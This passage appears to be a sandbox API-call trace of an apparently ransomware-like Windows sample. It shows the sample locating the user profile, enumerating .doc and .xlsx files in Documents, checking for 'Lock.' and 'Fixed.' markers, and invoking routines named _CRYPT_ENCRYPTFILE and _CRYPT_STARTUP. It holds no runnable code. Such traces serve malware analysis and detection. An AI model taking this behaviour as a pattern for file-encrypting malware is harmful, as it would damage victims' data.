ftLastWriteTime.dwLowDateTime=0x4e3029d0, ftLastWriteTime.dwHighDateTime=0x1d5ef02, nFileSizeHigh=0x0, nFileSizeLow=0xda0a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="1jNOs4dsiatFwtPt-_j2.doc", cAlternateFileName="1JNOS4~1.DOC")) returned 0 [0259.357] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0259.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.357] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.357] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x66) returned 0x2e558d8 [0259.358] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/1jNOs4dsiatFwtPt-_j2.doc", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\1jNOs4dsiatFwtPt-_j2.doc", lpFilePart=0x8cf650*="1jNOs4dsiatFwtPt-_j2.doc") returned 0x32 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.358] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1jNOs4dsiatFwtPt-_j2.doc" (normalized: "c:\\users\\fd1hvy\\documents\\1jnos4dsiatfwtpt-_j2.doc")) returned 0xffffffff [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.359] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.359] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.359] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1L1L.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L1L.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1L.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0259.361] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1L1L.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L1L.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1L.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.363] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0259.363] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0259.363] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0259.364] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0259.364] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.366] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/1L1L.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf4a770, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0x9bf84a30, ftLastAccessTime.dwHighDateTime=0x1d5e55c, ftLastWriteTime.dwLowDateTime=0x9bf84a30, ftLastWriteTime.dwHighDateTime=0x1d5e55c, nFileSizeHigh=0x0, nFileSizeLow=0x4997, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="1L1L.xlsx", cAlternateFileName="1L1L~1.XLS")) returned 0xa87710 [0259.366] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0259.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0259.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.367] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.367] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.367] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0259.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0259.367] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 